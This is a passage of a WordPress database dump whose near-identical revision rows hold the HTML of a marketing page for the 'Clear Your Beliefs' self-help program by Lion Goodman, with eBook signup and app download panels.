Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:41:55', '2014-11-14 07:41:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1764, 2, '2014-11-16 23:27:02', '2014-11-17 04:27:02', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center;padding-top: 30px !important;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-16 23:27:02', '2014-11-17 04:27:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1761, 2, '2014-11-16 21:53:52', '2014-11-17 02:53:52', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-1st-p" style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n&lt;img style=&quot;margin-top:-10px !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png&quot;\n<p class="tri-panel-3rd-p" style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-16 21:53:52', '2014-11-17 02:53:52', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1763, 2, '2014-11-16 23:25:47', '2014-11-17 04:25:47', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center;padding-top: 10px !important;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-16 23:25:47', '2014-11-17 04:25:47', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1762, 2, '2014-11-16 21:57:05', '2014-11-17 02:57:05', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n&lt;img style=&quot;margin-top:-10px !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png&quot;\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-16 21:57:05', '2014-11-17 02:57:05', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1766, 2, '2014-11-17 00:11:45', '2014-11-17 05:11:45', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n&lt;img style=&quot;margin-top:-10px !important; width:100% !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png&quot;\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-17 00:11:45', '2014-11-17 05:11:45', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1767, 2, '2014-11-18 18:17:47', '2014-11-18 23:17:47', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n&lt;img style=&quot;margin-top:-10px !important; width:100% !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg&quot;\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 18:17:47', '2014-11-18 23:17:47', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1768, 2, '2014-11-18 18:22:22', '2014-11-18 23:22:22', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n&lt;img style=&quot;margin-top:-10px !important; width:100% !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg&quot;\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> 